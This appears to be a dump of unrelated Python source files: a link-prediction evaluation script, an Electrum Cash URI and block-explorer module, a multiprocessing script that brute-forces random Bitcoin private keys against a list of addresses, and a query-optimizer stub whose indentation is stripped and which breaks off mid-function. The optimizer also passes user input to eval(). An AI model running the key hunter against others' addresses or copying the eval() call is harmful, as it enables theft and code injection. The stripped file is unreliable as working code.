# scoring are O(1) dict lookups instead of O(n) list scans.
print('\nCasting the test fold to dictionary.')
edge_subset_dict = {}
for src, dst in tqdm(edge_subset):
    edge_subset_dict.setdefault(src, []).append(dst)
# Split the array into N_CORES_TO_USE splits which will be placed into N_CORES_TO_USE cores.
split_arrays = np.array_split(np.array(non_edges), args.n_cores)
print('\nNumber of distinct nodes and edges', train.number_of_nodes(), train.number_of_edges())
print('Number of non existent edges in the graph is', len(non_edges))
# Create multiprocessing-specific structure 'Manager' and 'return_list'.
# The manager-backed list is shared across worker processes so each one
# can append its (scores, labels) result.
manager = mp.Manager()
return_list = manager.list()
# The algorithm was tested on the following 4 heuristics of Networkx library.
# resource_allocation_index, jaccard_coefficient, adamic_adar_index, preferential_attachment
heuristics = {'RA':nx.resource_allocation_index,
              'JA':nx.jaccard_coefficient,
              'AA':nx.adamic_adar_index,
              'PA':nx.preferential_attachment}
# args.heur is constrained by argparse choices, so this lookup cannot fail.
chosen_heur = heuristics[args.heur]
def predict_get_scores(Graph, heur, split, return_list, edge_subset):
    """Worker: score candidate edges with a link-prediction heuristic and
    label each against the held-out test split.

    :param Graph: training graph (NetworkX) with test edges removed
    :param heur: NetworkX heuristic, e.g. nx.jaccard_coefficient
    :param split: iterable of (u, v) candidate node pairs for this worker
    :param return_list: multiprocessing.Manager proxy list collecting results
    :param edge_subset: dict mapping node -> list of test-split neighbours
    """
    predictions = heur(Graph, split)
    scores, labels = [], []
    for (start, end, value) in tqdm(predictions):
        # Original code wrapped this in a bare `except:` because
        # edge_subset.get(start) can return None (TypeError on `in`).
        # Using a default empty tuple gives the same labels without
        # silently swallowing unrelated exceptions.
        label = end in edge_subset.get(start, ())
        scores.append(value)
        labels.append(label)
    return_list.append([scores, labels])
# Create the processess which are waiting to be executed.
# Monitor your CPU & RAM usage in a Linux shell by running 'top' command.
starttime = time.time()
processes = [None for i in range(args.n_cores)]
for i in range(args.n_cores):
    processes[i] = mp.Process(target=predict_get_scores, args=(train, chosen_heur, split_arrays[i], return_list, edge_subset_dict))
    processes[i].start()
# Join the processess.
print('\n')
print('Joining Processess, Performing Computation')
for process in processes:
    process.join()
print('\nProcessing done, returning list')
# Return the list of predictions.
# Each worker appended [scores, labels]; _getvalue() copies the proxy list.
y = return_list._getvalue()
print('Computation took {} seconds'.format(time.time() - starttime))
# Convert the array to a numpy array for further numpy routines.
print('Reshaping Predictions')
f = np.array(y, dtype='object')
scores,labels = f.T
scores = np.concatenate(scores, axis=0)
labels = np.concatenate(labels, axis=0)
print('Calculating TPR and FPR')
# Compute False and True positive rate from the list of labels and scores.
fpr, tpr, _ = roc_curve(labels, scores)
# Get AUC of ROC curve.
auc = roc_auc_score(labels, scores)
print('AUC of ROC curve is', auc)
if args.plots == 'YES':
    if args.confusion_mat == 'YES':
        print('Binarising the predictions with threshold')
        # Binarise the predictions with given threshold.
        binarised = np.where(np.array(scores) > args.thresh_bin, 1, 0)
        # Compute the Confusion Matrix, which can take a lot of time
        print('Computing Confusion Matrix')
        cm = confusion_matrix(labels, binarised)
    print('Plotting...')
    # Plot the ROC curve
    plt.figure()
    sns.lineplot(x=fpr, y=tpr, ci=None)
    plt.title("{0} {1} {2} {3}".format('ROC Curve for', chosen_heur.__name__, '- AUC:',str(auc)[:5]))
    plt.xlabel('False Positive Rate')
    plt.ylabel('True Positive Rate')
    plt.show()
    if args.confusion_mat == 'YES':
        # Plot the Confusion Matrix
        plt.figure()
        sns.heatmap(cm, annot=True, fmt='0.1f')
        plt.title("{0} {1}".format('Confusion Matrix for', chosen_heur.__name__))
        plt.xlabel('Ground Truth')
        plt.ylabel('Predicted Values')
        plt.show()
web.py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import decimal  # Qt 5.12 also exports Decimal, so take the package name
import os
import re
import shutil
import sys
import threading
import urllib
# Explicit submodule imports: `import urllib` alone does not guarantee
# urllib.parse / urllib.request are importable as attributes.
import urllib.parse
import urllib.request

from .address import Address
from . import bitcoin
from . import networks
from .util import format_satoshis_plain, bh2u, bfh, print_error, do_in_main_thread
from . import cashacct
from .i18n import _
# Explorer chosen when the user has not configured one (mainnet).
DEFAULT_EXPLORER = "Blockchair.com"

# Each table maps explorer name -> (base URL,
#                                   address format to render addresses in,
#                                   {'tx'/'addr'/'block' -> URL path segment}).
mainnet_block_explorers = {
    'Bitcoin.com': ('https://explorer.bitcoin.com/bch',
                    Address.FMT_CASHADDR,
                    {'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
    'Blockchair.com': ('https://blockchair.com/bitcoin-cash',
                       Address.FMT_CASHADDR,
                       {'tx': 'transaction', 'addr': 'address', 'block' : 'block'}),
    'BTC.com': ('https://bch.btc.com',
                Address.FMT_CASHADDR,
                {'tx': '', 'addr': '', 'block' : 'block'}),
    'ViaBTC.com': ('https://explorer.viawallet.com/bch',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
    'BlockExplorer.one': ('https://blockexplorer.one/bch/mainnet',
                          Address.FMT_CASHADDR,
                          {'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
    'oregano.de': ('https://explorer.oregano.de',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
    'Blockchain.com': ('https://www.blockchain.com/bch',
                       Address.FMT_CASHADDR,
                       {'tx': 'tx', 'addr': 'address', 'block': 'block'}),
    'Bitcoin Unlimited': ('https://explorer.bitcoinunlimited.info',
                          Address.FMT_CASHADDR,
                          {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
    'Loping.net': ('https://bch.loping.net',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}

DEFAULT_EXPLORER_TESTNET = 'Bitcoin.com'

testnet_block_explorers = {
    'Bitcoin.com' : ('https://explorer.bitcoin.com/tbch',
                     Address.FMT_LEGACY, # For some reason testnet expects legacy and fails on bchtest: addresses.
                     {'tx': 'tx', 'addr': 'address', 'block' : 'block'}),
    'BlockExplorer.one': ('https://blockexplorer.one/bch/testnet',
                          Address.FMT_CASHADDR,
                          {'tx': 'tx', 'addr': 'address', 'block' : 'blockHash'}),
    'oregano.de': ('https://testnet-explorer.oregano.de',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
    'Blockchain.com': ('https://www.blockchain.com/bch-testnet',
                       Address.FMT_CASHADDR,
                       {'tx': 'tx', 'addr': 'address', 'block': 'block'}),
    'Bitcoin Unlimited': ('https://texplorer.bitcoinunlimited.info',
                          Address.FMT_CASHADDR,
                          {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
    'Loping.net': ('https://tbch.loping.net',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}

DEFAULT_EXPLORER_TESTNET4 = 'Loping.net'

testnet4_block_explorers = {
    'Loping.net': ('https://tbch4.loping.net',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}

DEFAULT_EXPLORER_SCALENET = 'Loping.net'

scalenet_block_explorers = {
    'Loping.net': ('https://sbch.loping.net',
                   Address.FMT_CASHADDR,
                   {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}

DEFAULT_EXPLORER_TAXCOIN = 'The Taxplorer'

taxcoin_block_explorers = {
    'The Taxplorer': ('https://taxplorer.loping.net',
                      Address.FMT_CASHADDR,
                      {'tx': 'tx', 'addr': 'address', 'block': 'block-height'}),
}
def BE_info():
    """Return the block-explorer table appropriate for the active network."""
    per_net = (
        (networks.TestNet, testnet_block_explorers),
        (networks.TestNet4, testnet4_block_explorers),
        (networks.ScaleNet, scalenet_block_explorers),
        (networks.TaxCoinNet, taxcoin_block_explorers),
    )
    for net_cls, explorers in per_net:
        if networks.net is net_cls:
            return explorers
    return mainnet_block_explorers
def BE_tuple(config):
    """Return the (url_base, addr_fmt, parts) tuple for the configured
    explorer, falling back to the network default when the configured
    name is unknown or no longer valid."""
    explorers = BE_info()
    chosen = explorers.get(BE_from_config(config))
    if chosen is None:
        # Block explorer stored in config may be bad / no longer valid.
        chosen = explorers.get(BE_default_explorer())
    return chosen
def BE_default_explorer():
    """Name of the default block explorer for the active network."""
    per_net = (
        (networks.TestNet, DEFAULT_EXPLORER_TESTNET),
        (networks.TestNet4, DEFAULT_EXPLORER_TESTNET4),
        (networks.ScaleNet, DEFAULT_EXPLORER_SCALENET),
        (networks.TaxCoinNet, DEFAULT_EXPLORER_TAXCOIN),
    )
    for net_cls, default_name in per_net:
        if networks.net is net_cls:
            return default_name
    return DEFAULT_EXPLORER
def BE_from_config(config):
    """Explorer name stored in *config*, or the network default if unset."""
    fallback = BE_default_explorer()
    return config.get('block_explorer', fallback)
def BE_URL(config, kind, item):
    """Build a block-explorer URL for *item*.

    :param kind: one of 'tx', 'addr' or 'block'
    :param item: txid/block string, or an Address when kind == 'addr'
    :return: URL string, or None if no explorer / unsupported kind
    """
    info = BE_tuple(config)
    if not info:
        return None
    url_base, addr_fmt, parts = info
    kind_str = parts.get(kind)
    if kind_str is None:
        return None
    if kind == 'addr':
        assert isinstance(item, Address)
        # Render the address in the format this explorer expects.
        item = item.to_string(addr_fmt)
    pieces = [piece for piece in (url_base, kind_str, item) if piece]
    return "/".join(pieces)
def BE_sorted_list():
    """Explorer names for the active network, sorted alphabetically."""
    names = list(BE_info())
    names.sort()
    return names
def _strip_cashacct_str(s: str) -> str:
    """Strip emojis and ';' characters from a cashacct string of the
    form name#number[.123], and trim surrounding whitespace."""
    without_emoji = cashacct.CashAcct.strip_emoji(s)
    return without_emoji.replace(';', '').strip()
def create_URI(addr, amount, message, *, op_return=None, op_return_raw=None, net=None):
    """Build a payment URI for an Address (or a cashacct string).

    :param addr: Address instance, or a cashacct string ("name#number")
    :param amount: amount in satoshis (falsy -> omitted)
    :param message: human-readable message (URL-quoted into the query)
    :param op_return / op_return_raw: mutually exclusive OP_RETURN payloads
    :param net: network to render the address for (None -> active network)
    :return: URI string, or "" if *addr* is neither Address nor cashacct
    :raises ValueError: if both op_return and op_return_raw are given
    """
    is_cashacct = bool(isinstance(addr, str) and cashacct.CashAcct.parse_string(addr))
    if not isinstance(addr, Address) and not is_cashacct:
        return ""
    if op_return is not None and op_return_raw is not None:
        # Bug fix: the message previously named a nonexistent kwarg
        # 'op_return_hex'; the actual kwarg is 'op_return_raw'.
        raise ValueError('Must specify exactly one of op_return or op_return_raw as kwargs to create_URI')
    if is_cashacct:
        scheme, path = cashacct.URI_SCHEME, _strip_cashacct_str(addr)
    else:
        scheme, path = addr.to_URI_components(net=net)
    query = []
    if amount:
        query.append('amount=%s'%format_satoshis_plain(amount))
    if message:
        query.append('message=%s'%urllib.parse.quote(message))
    if op_return:
        query.append(f'op_return={str(op_return)}')
    if op_return_raw:
        query.append(f'op_return_raw={str(op_return_raw)}')
    p = urllib.parse.ParseResult(scheme=scheme,
                                 netloc='', path=path, params='',
                                 query='&'.join(query), fragment='')
    return urllib.parse.urlunparse(p)
def urlencode(s):
    """URL Encode; %-quote the characters of *s* that are special in a
    URL or URI fragment."""
    quoted = urllib.parse.quote(s)
    return quoted
def urldecode(url):
    """Inverse of urlencode: replace %xx escapes with their characters."""
    decoded = urllib.parse.unquote(url)
    return decoded
def parseable_schemes(net=None) -> tuple:
    """URI schemes this module can parse for *net* (None -> active network):
    the cashaddr prefix plus the cashacct scheme."""
    active_net = networks.net if net is None else net
    return (active_net.CASHADDR_PREFIX, cashacct.URI_SCHEME)
class ExtraParametersInURIWarning(RuntimeWarning):
    ''' Raised by parse_URI to indicate that parsing succeeded but that
    extra (unknown) parameters were encountered while parsing.
    args[0] is the function return value (dict of parsed args).
    args[1:] are the URL parameters that were not understood (unknown params)'''
class DuplicateKeyInURIError(RuntimeError):
    ''' Raised on duplicate parameter keys in a URI.
    args[0] is a translated error message suitable for the UI.
    args[1:] is the list of duplicate keys. '''
class BadSchemeError(RuntimeError):
    ''' Raised if the scheme is bad/unknown for a URI. '''
class BadURIParameter(ValueError):
    ''' Raised if:
        - 'amount' is not numeric,
        - 'address' is invalid,
        - bad cashacct string,
        - 'time' or 'exp' are not ints

        args[0] is the bad argument name e.g. 'amount'
        args[1] is the underlying Exception that was raised (if any, may be missing). '''
def parse_URI(uri, on_pr=None, *, net=None, strict=False, on_exc=None):
    """ If strict=True, may raise ExtraParametersInURIWarning (see docstring
    above).

    on_pr - a callable that will run in the context of a daemon thread if this
    is a payment request which requires further network processing. A single
    argument is passed to the callable, the payment request after being verified
    on the network. Note: as stated, this runs in the context of the daemon
    thread, unlike on_exc below.

    on_exc - (optional) a callable that will be executed in the *main thread*
    only in the cases of payment requests and only if they fail to serialize or
    deserialize. The callable must take 1 arg, a sys.exc_info() tuple. Note: as
    stated, this runs in the context of the main thread always, unlike on_pr
    above.

    May raise DuplicateKeyInURIError if duplicate keys were found.
    May raise BadSchemeError if unknown scheme.
    May raise Exception subclass on other misc. failure.

    Returns a dict of uri_param -> value on success """
    if net is None:
        net = networks.net
    if ':' not in uri:
        # Bare address with no scheme: validate it, then return early.
        Address.from_string(uri, net=net)
        return {'address': uri}

    u = urllib.parse.urlparse(uri, allow_fragments=False)  # allow_fragments=False allows for cashacct:name#number URIs
    # The scheme always comes back in lower case
    accept_schemes = parseable_schemes(net=net)
    if u.scheme not in accept_schemes:
        raise BadSchemeError(_("Not a {schemes} URI").format(schemes=str(accept_schemes)))
    address = u.path

    is_cashacct = u.scheme == cashacct.URI_SCHEME

    # python for android fails to parse query
    if address.find('?') > 0:
        # Bug fix: split on the *first* '?' only. A second '?' anywhere in
        # the query would previously make the 2-tuple unpack raise ValueError.
        address, query = u.path.split('?', 1)
        pq = urllib.parse.parse_qs(query, keep_blank_values=True)
    else:
        pq = urllib.parse.parse_qs(u.query, keep_blank_values=True)

    for k, v in pq.items():
        if len(v) != 1:
            raise DuplicateKeyInURIError(_('Duplicate key in URI'), k)

    out = {k: v[0] for k, v in pq.items()}
    if address:
        if is_cashacct:
            if '%' in address:
                # on macOS and perhaps other platforms the '#' character may
                # get passed-in as a '%23' if opened from a link or from
                # some other source. The below call is safe and won't raise.
                address = urldecode(address)
            if not cashacct.CashAcct.parse_string(address):
                raise BadURIParameter('address', ValueError(_("{acct_name} is not a valid cashacct string").format(acct_name=address)))
            address = _strip_cashacct_str(address)
        else:
            # validate
            try: Address.from_string(address, net=net)
            except Exception as e: raise BadURIParameter('address', e) from e
        out['address'] = address

    if 'amount' in out:
        try:
            am = out['amount']
            # Accept "<mantissa>X<exp>" scientific-ish notation as well as a
            # plain decimal amount in whole coins.
            m = re.match(r'([0-9.]+)X([0-9]{2})', am)
            if m:
                k = int(m.group(2)) - 8
                amount = decimal.Decimal(m.group(1)) * int(pow(10, k))
            else:
                amount = decimal.Decimal(am) * int(bitcoin.COIN)
            out['amount'] = int(amount)
        except (ValueError, decimal.InvalidOperation, TypeError) as e:
            raise BadURIParameter('amount', e) from e

    if strict and 'memo' in out and 'message' in out:
        # these two args are equivalent and cannot both appear together
        raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'memo', 'message')
    elif 'message' in out:
        out['memo'] = out['message']
    elif 'memo' in out:
        out['message'] = out['memo']

    if 'time' in out:
        try: out['time'] = int(out['time'])
        except ValueError as e: raise BadURIParameter('time', e) from e

    if 'exp' in out:
        try: out['exp'] = int(out['exp'])
        except ValueError as e: raise BadURIParameter('exp', e) from e

    if 'sig' in out:
        try: out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
        except Exception as e: raise BadURIParameter('sig', e) from e

    if 'op_return_raw' in out and 'op_return' in out:
        if strict:
            # these two args cannot both appear together
            raise DuplicateKeyInURIError(_('Duplicate key in URI'), 'op_return', 'op_return_raw')
        del out['op_return_raw']  # if not strict, just pick 1 and delete the other

    if 'op_return_raw' in out:
        # validate op_return_raw arg
        try: bfh(out['op_return_raw'])
        except Exception as e: raise BadURIParameter('op_return_raw', e) from e

    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    is_pr = bool(r or (name and sig))

    if is_pr and is_cashacct:
        raise ValueError(_("'{uri_scheme}' payment requests are not currently supported").format(uri_scheme=cashacct.URI_SCHEME))

    if on_pr and is_pr:
        def get_payment_request_thread():
            from . import paymentrequest as pr
            try:
                if name and sig:
                    s = pr.serialize_request(out).SerializeToString()
                    request = pr.PaymentRequest(s)
                else:
                    request = pr.get_payment_request(r)
            except:
                ''' May happen if the values in the request are such
                that they cannot be serialized to a protobuf. '''
                einfo = sys.exc_info()
                print_error("Error processing payment request:", str(einfo[1]))
                if on_exc:
                    do_in_main_thread(on_exc, einfo)
                return
            if on_pr:
                # FIXME: See about also making this use do_in_main_thread.
                # However existing code for Android and/or iOS may not be
                # expecting this, so we will leave the original code here where
                # it runs in the daemon thread context. :/
                on_pr(request)
        t = threading.Thread(target=get_payment_request_thread, daemon=True)
        t.start()

    if strict:
        accept_keys = {'r', 'sig', 'name', 'address', 'amount', 'label', 'message', 'memo', 'op_return', 'op_return_raw', 'time', 'exp'}
        extra_keys = set(out.keys()) - accept_keys
        if extra_keys:
            raise ExtraParametersInURIWarning(out, *tuple(extra_keys))

    return out
def check_www_dir(rdir):
    """Ensure *rdir* exists and is populated with the static www assets:
    copies the bundled index.html if missing, then downloads the jQuery/
    qrcode assets that are not yet present. Network I/O happens here."""
    if not os.path.exists(rdir):
        os.mkdir(rdir)
    index = os.path.join(rdir, 'index.html')
    if not os.path.exists(index):
        print_error("copying index.html")
        src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
        shutil.copy(src, index)
    files = [
        "https://code.jquery.com/jquery-1.9.1.min.js",
        "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
        "https://code.jquery.com/ui/1.10.3/jquery-ui.js",
        "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
    ]
    for URL in files:
        # Derive the local filename from the URL path component.
        path = urllib.parse.urlsplit(URL).path
        filename = os.path.basename(path)
        path = os.path.join(rdir, filename)
        if not os.path.exists(path):
            print_error("downloading ", URL)
            # NOTE(review): no error handling -- a network failure here
            # propagates to the caller.
            urllib.request.urlretrieve(URL, path)
|
Bitcoin_randomCPU_Divison.py | '''
Made by Mizogg Look for Bitcoin Compressed and Uncompressed 3 bc1 Using iceland2k14 secp256k1 https://github.com/iceland2k14/secp256k1 fastest Python Libary
Good Luck and Happy Hunting Bitcoin_randomCPU_Divison.py Version 1 scan randomly in Range Divsion with CPU Speed Improvments
https://mizogg.co.uk
'''
import secp256k1 as ice
import time, multiprocessing, random
from multiprocessing import pool, Event, Process, Queue, Value, cpu_count
from time import sleep
def hunt(start, stop, add, rangediv, display, cores='all'):
    """Spawn worker processes that each run main() over the key range.

    :param start, stop: integer private-key range bounds
    :param add: set of target Bitcoin addresses
    :param rangediv: number of sub-divisions of the range per scan
    :param display: 1 = terse progress, 2 = verbose per-key output
    :param cores: 'all', or a number of worker processes to use
    """
    try:
        available_cores = cpu_count()
        if cores == 'all':
            cores = available_cores
        else:
            # Fix: int('garbage') used to raise ValueError out of the elif
            # condition; fall back to 1 worker on any bad value instead.
            try:
                cores = int(cores)
            except (TypeError, ValueError):
                cores = 1
            if not 0 < cores <= available_cores:
                cores = 1
        # Shared unsigned-long counter: workers increment it to compute speed.
        counter = Value('L')
        # (Removed unused Event/Queue locals from the original.)
        workers = []
        for _ in range(cores):
            p = Process(target=main, args=(counter, start, stop, add, display, rangediv))
            workers.append(p)
            p.start()
        for worker in workers:
            worker.join()
    except(KeyboardInterrupt, SystemExit):
        exit('\nCTRL-C detected. Exiting gracefully. Thank you and Happy Hunting')
def main(counter, start, stop, add, display, rangediv):
    # Worker loop: repeatedly sample random keys from sub-divisions of
    # [start, stop), derive the four address forms, and check them against
    # the target set `add`. Runs until interrupted.
    count = 0
    st = time.time()
    sleep(0.00001)
    while True:
        try:
            data = []
            with counter.get_lock():
                counter.value += 1
            # Aggregate speed across all workers via the shared counter.
            speed = round(counter.value/(time.time() - st))
            cpuspeed = speed*rangediv
            def data_wallet():
                # Closure over `div` and `data`, both (re)assigned below
                # before this is invoked.
                for i in range(0,rangediv):
                    percent = div * i
                    first = start+percent
                    # NOTE(review): `last = start+first` makes the sample
                    # window [start+percent, 2*start+percent) rather than
                    # the sub-division [first, first+div) -- looks
                    # unintended; confirm against author's intent.
                    last = start+first
                    ran= random.randrange(first,last)
                    seed = str(ran)
                    HEX = "%064x" % ran
                    wifc = ice.btc_pvk_to_wif(HEX)
                    wifu = ice.btc_pvk_to_wif(HEX, False)
                    caddr = ice.privatekey_to_address(0, True, int(seed)) #Compressed
                    uaddr = ice.privatekey_to_address(0, False, int(seed)) #Uncompressed
                    p2sh = ice.privatekey_to_address(1, True, int(seed)) #p2sh
                    bech32 = ice.privatekey_to_address(2, True, int(seed)) #bech32
                    data.append({
                        'seed': seed,
                        'HEX': HEX,
                        'wifc': wifc,
                        'wifu': wifu,
                        'caddr': caddr,
                        'uaddr': uaddr,
                        'p2sh': p2sh,
                        'bech32': bech32,
                        'percent': f"Hex scan Percent {i}%",
                    })
            # Reset the batch, then generate rangediv candidate wallets.
            data = []
            count += 1
            remainingtotal=stop-start
            div= round(remainingtotal / rangediv)
            finish = div + start
            data_wallet()
            for data_w in data:
                caddr = data_w['caddr']
                uaddr = data_w['uaddr']
                p2sh = data_w['p2sh']
                bech32 = data_w['bech32']
                if caddr in add or uaddr in add or p2sh in add or bech32 in add:
                    print('\nMatch Found IN : ', data_w['percent'])
                    print('\nPrivatekey (dec): ', data_w['seed'], '\nPrivatekey (hex): ', data_w['HEX'], '\nPrivatekey Uncompressed: ', data_w['wifu'], '\nPrivatekey compressed: ', data_w['wifc'], '\nPublic Address 1 Uncompressed: ', data_w['uaddr'], '\nPublic Address 1 compressed: ', data_w['caddr'], '\nPublic Address 3 P2SH: ', data_w['p2sh'], '\nPublic Address bc1 BECH32: ', data_w['bech32'])
                    with open("winner.txt", "a") as f:
                        f.write(f"""\nMatch Found IN {data_w['percent']}
Privatekey (dec): {data_w['seed']}
Privatekey (hex): {data_w['HEX']}
Privatekey Uncompressed: {data_w['wifu']}
Privatekey Compressed: {data_w['wifc']}
Public Address 1 Uncompressed: {data_w['uaddr']}
Public Address 1 Compressed: {data_w['caddr']}
Public Address 3 P2SH: {data_w['p2sh']}
Public Address bc1 BECH32: {data_w['bech32']}
=====Made by mizogg.co.uk Donations 3P7PZLbwSt2bqUMsHF9xDsaNKhafiGuWDB =====""")
                else:
                    if display == 1:
                        print('Scan: ', count , ' : Keys/s : ', str(cpuspeed), end='\r')
                    elif display == 2:
                        for bad_wallet in data:
                            #print('\nPrivatekey (dec): ', bad_wallet['seed'], '\nPrivatekey (hex): ', bad_wallet['HEX'], '\nPrivatekey Uncompressed: ', bad_wallet['wifu'], '\nPrivatekey compressed: ', bad_wallet['wifc'], '\nPublic Address 1 Uncompressed: ', bad_wallet['uaddr'], '\nPublic Address 1 compressed: ', bad_wallet['caddr'], '\nPublic Address 3 P2SH: ', bad_wallet['p2sh'], '\nPublic Address bc1 BECH32: ', bad_wallet['bech32'])
                            print(bad_wallet['percent'], '\nPrivatekey (hex): ', bad_wallet['HEX'], end='\r')
                    else:
                        print("WRONG NUMBER!!! MUST CHOSE 1 or 2")
                        # NOTE(review): this break only exits the inner for
                        # loop; the outer while keeps running.
                        break
        except(KeyboardInterrupt, SystemExit):
            exit('\nCTRL-C detected. Exiting gracefully. Thank you and Happy Hunting')
if __name__ == '__main__':
    # Entry point: load target addresses from puzzle.txt, prompt for scan
    # parameters, then fan out worker processes via hunt().
    print('[+] Starting.Bitcoin_randomCPU_Divison.py Please Wait.....Bitcoin Address List Loading.....')
    filename ='puzzle.txt'
    with open(filename) as f:
        line_count = 0
        for line in f:
            # Bug fix: the original evaluated `line != "\n"` and discarded
            # the result, so blank lines were counted too. Only count
            # non-blank lines.
            if line != "\n":
                line_count += 1
    with open(filename) as file:
        add = file.read().split()
    # Set membership makes the per-key lookups O(1).
    add = set(add)
    print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
    howmany=int(input("Number of Cores CPU -> "))
    start=int(input("start range Min 1-115792089237316195423570985008687907852837564279074904382605163141518161494335 -> "))
    stop=int(input("stop range Max 115792089237316195423570985008687907852837564279074904382605163141518161494336 -> "))
    rangediv=int(input("Division of Range 1% t0 ???% -> "))
    display =int(input("Choose method Display Method: 1 - Less Details:(Quicker); 2 - More Details:(Slower) "))
    print("Starting search... Please Wait min range: " + str(start))
    print("Max range: " + str(stop))
    print("==========================================================")
    print('Total Bitcoin Addresses Loaded and Checking : ',str (line_count))
    hunt(start, stop, add, rangediv, display, cores = howmany)
query_optimizer.py | """
This file composes the functions that are needed to perform query optimization.
Currently, given a query, it does logical changes to forms that are sufficient conditions.
Using statistics from Filters module, it outputs the optimal plan (converted query with models needed to be used).
To see the query optimizer performance in action, simply run
python query_optimizer/query_optimizer.py
@Jaeho Bang
"""
# The query optimizer decide how to label the data points
# Load the series of queries from a txt file?
import sys
import os
import socket
import threading
import numpy as np
from itertools import product
from time import sleep
eva_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(eva_dir)
import constants
class QueryOptimizer:
"""
TODO: If you have a classifier for =, you can make a classifier for !=
TODO: Deal with parenthesis
"""
def __init__(self, ip_str="127.0.0.1"):
self.ip_str = ip_str
#self.startSocket()
self.operators = ["!=", ">=", "<=", "=", "<", ">"]
self.separators = ["||", "&&"]
def startSocket(self):
thread = threading.Thread(target=self.inputQueriesFromSocket)
thread.daemon = True
thread.start()
while True:
input = eval(input('Type in your query in the form of __label__ > __number__\n'))
self.parseInput(input)
def parseInput(self, input):
"""
TODO: Need to provide query formats that can be used
:param input: string to be parsed
:return: something that the Load() class can understand
"""
pass
def inputQueriesFromTxt(self, input_path):
"""
TODO: Read the file line by line, use self.parseInput to give back commands
:param input_path: full directory + file name
:return: method of training the pps
"""
pass
def inputQueriesFromSocket(self):
sock = socket.socket()
sock.bind(self.ip_str, 123)
sock.listen(3)
print("Waiting on connection")
conn = sock.accept()
print("Client connected")
while True:
m = conn[0].recv(4096)
conn[0].send(m[::-1])
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def _findParenthesis(self, query):
start = []
end = []
query_copy = query
index = query_copy.find("(")
while index != -1:
start.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find("(")
query_copy = query
index = query_copy.find(")")
while index != -1:
end.append(index)
query_copy = query_copy[index + 1:]
index = query_copy.find(")")
return [start, end]
def _parseQuery(self, query):
"""
Each sub query will be a list
There will be a separator in between
:param query:
:return:
"""
query_parsed = []
query_subs = query.split(" ")
query_operators = []
for query_sub in query_subs:
if query_sub == "||" or query_sub == "&&":
query_operators.append(query_sub)
else:
if True not in [operator in self.operators for operator in query_sub]:
return [],[]
for operator in self.operators:
query_sub_list = query_sub.split(operator)
if type(query_sub_list) is list and len(query_sub_list) > 1:
query_parsed.append([query_sub_list[0], operator, query_sub_list[1]])
break
#query_parsed ex: [ ["t", "=", "van"], ["s", ">", "60"]]
#query_operators ex: ["||", "||", "&&"]
return query_parsed, query_operators
def _logic_reverse(self, str):
if str == "=":
return "!="
elif str == "!=":
return "="
elif str == ">":
return "<="
elif str == ">=":
return "<"
elif str == "<":
return ">="
elif str == "<=":
return ">"
def convertL2S(self, parsed_query, query_ops):
final_str = ""
index = 0
for sub_parsed_query in parsed_query:
if len(parsed_query) >= 2 and index < len(query_ops):
final_str += ''.join(sub_parsed_query) + " " + query_ops[index] + " "
index += 1
else:
final_str += ''.join(sub_parsed_query)
return final_str
def _wrangler(self, query, label_desc):
"""
import itertools
iterables = [ [1,2,3,4], [88,99], ['a','b'] ]
for t in itertools.product(*iterables):
print t
Different types of checks are performed
1. not equals check (f(C) != v)
2. comparison check (f(C) > v -> f(C) > t, for all t <= v)
3. Range check (v1 <= f(C) <= v2) - special type of comparison check
4. No-predicates = when column in finite and discrete, it can still benefit
ex) 1 <=> type = car U type = truck U type = SUV
:return: transformed query
"""
#TODO: Need to implement range check
query_parsed, query_operators = self._parseQuery(query)
#query_sorted = sorted(query_parsed)
query_transformed = []
equivalences = []
equivalences_op = []
for query_sub_list in query_parsed:
subject = query_sub_list[0]
operator = query_sub_list[1]
object = query_sub_list[2]
assert(subject in label_desc) # Label should be in label description dictionary
l_desc = label_desc[subject]
if l_desc[0] == constants.DISCRETE:
equivalence = [self.convertL2S([query_sub_list], [])]
assert(operator == "=" or operator == "!=")
alternate_string = ""
for category in l_desc[1]:
if category != object:
alternate_string += subject + self._logic_reverse(operator) + category + " && "
